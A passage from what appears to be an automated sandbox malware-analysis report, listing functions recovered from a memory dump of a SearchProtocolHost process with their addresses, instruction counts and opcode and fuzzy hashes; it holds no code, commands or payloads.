                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22bc0f94cb1edcedad323755a53077bb836bff9308fb563bdc8ceb18a6eca50f
                                                                                      • Instruction ID: 8525856e1153f2bfea415147013c71a0a3675ac325fc06241548441a1be5cbe4
                                                                                      • Opcode Fuzzy Hash: 22bc0f94cb1edcedad323755a53077bb836bff9308fb563bdc8ceb18a6eca50f
                                                                                      • Instruction Fuzzy Hash: AFF0E2319516909FDB60D3BBC848F11B3D8ABC4770F9F90E4D919C7991C320D840CA90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0386505B Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d076ec63f9d94cbf6db389f9a36ce4eccfad367415723cf744c5d8fda14d6ce
                                                                                      • Instruction ID: a072c134fc068482a2144403b189dd17ea3d272fb9567514deb567394d0bf13a
                                                                                      • Opcode Fuzzy Hash: 7d076ec63f9d94cbf6db389f9a36ce4eccfad367415723cf744c5d8fda14d6ce
                                                                                      • Instruction Fuzzy Hash: 54F08274A00648ABDB04EBB9D959E5EB7F8AF49708F140498E501EF2C5EA74D900C758
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F7CF Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99a15c4d2f1e810519cd730fbb7beaaac9fc5e698968f0a84ad19619fd590fed
                                                                                      • Instruction ID: 2bfd12a1ef9105fd6e437964996285896d4d86226e5ca55cd72166fa8564d731
                                                                                      • Opcode Fuzzy Hash: 99a15c4d2f1e810519cd730fbb7beaaac9fc5e698968f0a84ad19619fd590fed
                                                                                      • Instruction Fuzzy Hash: 04F08274A00648EFDB04DBA9D549A5EB7F8EF48704F440498E601EF2C1E974D900C718
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F717 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1f4c80c978d44066d28232d9bd9b6735a1bebb41556c8232df40153f9c41e7d
                                                                                      • Instruction ID: cb74bec50825ab4efc3c40ef3b1d4f8b4eefb43e346e276a5d5f5a002f4f7cb8
                                                                                      • Opcode Fuzzy Hash: b1f4c80c978d44066d28232d9bd9b6735a1bebb41556c8232df40153f9c41e7d
                                                                                      • Instruction Fuzzy Hash: 34F08278A00248EBDB04DBE9D949A5EB7F8AF48708F440498E601EF2C1D974D900C758
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C174A Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a89c3a6356fde32b7f765da1ba0858bba5d7a02401a02c9719920a3b447a8874
                                                                                      • Instruction ID: d639d60c756d502c21036866d7cb6dcf5d709affa78e51a44e319b25a4ff7178
                                                                                      • Opcode Fuzzy Hash: a89c3a6356fde32b7f765da1ba0858bba5d7a02401a02c9719920a3b447a8874
                                                                                      • Instruction Fuzzy Hash: DCE09272601821ABD211AB58EC00F66B3ADEBD5A60F09447DF944DB214D628DD01C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03790630 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction ID: 627430de3e13b660d3fe11aff080637931fa849fe19c6711b4290f8a160bf7d7
                                                                                      • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction Fuzzy Hash: 02F0ED3A2043449FEB05CF15E080AA5BBE8AB89360B04049AEC068B341DB71F881CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03863336 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                      • Instruction ID: 74e5d618925a6447f068abdeec91706a029f12b21bbe2505b27dae2ee0e8722c
                                                                                      • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                      • Instruction Fuzzy Hash: ACE0ED76110604BBE725DB58DD05FA6B3ECEB84720F180698B515D61E0DAB0FE40CA64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03792500 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6ac35942098c04f5b441070df3aad01f09eaca895eebb8b824b3fb5d51bea1d9
                                                                                      • Instruction ID: c87795025661461f26b356f1dc3ce5e2ce8bfd597c4273c667dbf9b9d7304ab7
                                                                                      • Opcode Fuzzy Hash: 6ac35942098c04f5b441070df3aad01f09eaca895eebb8b824b3fb5d51bea1d9
                                                                                      • Instruction Fuzzy Hash: E7E09236100A54ABD721FB19DC05F9AB7AAEF94360F104615F1165B1A1CB30A911CBC4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037881EB Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction ID: 8bd95110dc76e55f42e2fb65f664ea8105270c26a76745800d912a35134bb6bc
                                                                                      • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction Fuzzy Hash: 41E0CD35494610FFD731FF14DC04F5176B5FF44710F14055DF1860A0608FB49881DA49
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378B502 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction ID: 323cbc564a2327e34fa6dfc4f1a27958a0fe80d288da323e51844c7268c27738
                                                                                      • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction Fuzzy Hash: A9D05E36092B50AAD732BF14ED09F92BAB6AF80B11F190528B1051A8F0C6A1ED85CA90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380E588 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction ID: a657d73e17272b21381c45cb94c6ff116332f187d8bccf9fa0aa1285a07db331
                                                                                      • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction Fuzzy Hash: 74E0EC39950B849FDF22DF99CA44F5AF7F6BB84B00F190858A5089F6A0D624E900CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378A093 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                      • Instruction ID: af1daf818e749ebaeb6bcc75b04db37419a2fcf914c278d461bd40419690552c
                                                                                      • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                      • Instruction Fuzzy Hash: 84D0223220203493CB38BB456914F63B9059B80A50F0A002E380A83800C0008C43D6E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CA750 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                      • Instruction ID: 470beb7f8c4a4583e738013755337c81e24c4679d7bf5358b6bd61b3bd024b6f
                                                                                      • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                      • Instruction Fuzzy Hash: 67D0123B1D064CBBDB11DF65DC01F957BA9E794B60F044120B5088B5A0CA3AE950D984
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A01C0 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                      • Instruction ID: f2ce49110ce9bbd1498a73927a3543a08918a31a4a4766cba8b73fe6ef3d341f
                                                                                      • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                      • Instruction Fuzzy Hash: 86D0E935352D80DFD61ACB1DC995B5673A8BB44B44F8545D0E901CB762D66CD944CA04
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CC620 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                      • Instruction ID: b0c6a98f9fce0b10ba896cc7b1feeb2ad8a5fa6594416a13dcc7ed2ee7c9ce37
                                                                                      • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                      • Instruction Fuzzy Hash: 87C01236150644AFD711DE98CD01F0177A9E798B00F000021F2044B570C531E810DA44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B0230 Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                      • Instruction ID: 36e38997ba4606a2b1365e54e4f128ec57c3700642153edbe8e38d0cc0c0ca4a
                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                      • Instruction Fuzzy Hash: C6D0123610024CEFCB01DF40C854E9A773AFFC8710F108019FD190B6108A31ED62DA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B332D Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                      • Instruction ID: 97dd089cec78426186ed60436fb4947f4819e76aa1d2bc001c5b44d67bab4ead
                                                                                      • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                      • Instruction Fuzzy Hash: 7CC08C7C1417806AFB2ADB00CD14B2A76B8AB08A05F8C029CAA041E4A1C76AE8418618
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03790670 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                      • Instruction ID: 4e6a8d2dea1cbff4afea227079e9a3d20cc6e7b943925a16022a57351ca52014
                                                                                      • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                      • Instruction Fuzzy Hash: 2AC00239741A408BDE15CA19C688A1977E8B744740F1508D0E8058BA21D624E800CA10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f315ab7f1b515c3519c2a9bdb9bda7edc3c59ffc3faa32272374660ebaff369a
                                                                                      • Instruction ID: 19bafa4ca939a1615a439758e0a2bc242d33c24ed18187e58d16c7571c030f71
                                                                                      • Opcode Fuzzy Hash: f315ab7f1b515c3519c2a9bdb9bda7edc3c59ffc3faa32272374660ebaff369a
                                                                                      • Instruction Fuzzy Hash: DB90022161500812E540B2585518706001587D4601F51D525A4014554DC7698A5576A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2AA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d7f807a8af80f7292727033ff69c8ad7f3da7fd8cac8b9def63bbe73547a82b
                                                                                      • Instruction ID: aee4a73251ef065f9f33de27d990da0675826a55f4581a5d17b93de3052afdd5
                                                                                      • Opcode Fuzzy Hash: 6d7f807a8af80f7292727033ff69c8ad7f3da7fd8cac8b9def63bbe73547a82b
                                                                                      • Instruction Fuzzy Hash: 3890023121100C12E504A2584904686000587D4701F51C525AA014655ED77588917132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D29D0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 814c405332c3e07c9c61bee33622c83f336d529dda53d8a77d686cdd7d468b7f
                                                                                      • Instruction ID: 6219aba5a699cbeb199be84fcb40dabedd9e3be981561a867b1d6f3c8074aee6
                                                                                      • Opcode Fuzzy Hash: 814c405332c3e07c9c61bee33622c83f336d529dda53d8a77d686cdd7d468b7f
                                                                                      • Instruction Fuzzy Hash: 6C9002A1211144A29900E3588504B0A450587E4601B51C52AE5044560CC6358851B136
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2F30 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e04bb8ccef25fb2fd92242043c3125f3cd36c06ba690d8f7fadf3a23c3f0444
                                                                                      • Instruction ID: fa03aba3c4c53c59d35d0fad189de08087cd6a1134ee46a33b9a6147e00f334d
                                                                                      • Opcode Fuzzy Hash: 3e04bb8ccef25fb2fd92242043c3125f3cd36c06ba690d8f7fadf3a23c3f0444
                                                                                      • Instruction Fuzzy Hash: F190022121144852E540A3584904B0F410587E5602F91C52DA8146554CCA2588557722
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d528f5cb92f16a504fcf0c343c18d44c117d925920b6a2ef5772866753bfd827
                                                                                      • Instruction ID: e8f43559afab963ad073cec302ca4f911d3c37c16899b806394d0017caab165c
                                                                                      • Opcode Fuzzy Hash: d528f5cb92f16a504fcf0c343c18d44c117d925920b6a2ef5772866753bfd827
                                                                                      • Instruction Fuzzy Hash: 5690022125100C12E540B25885147070006C7D4A01F51C525A4014554DC726896576B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2EC0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
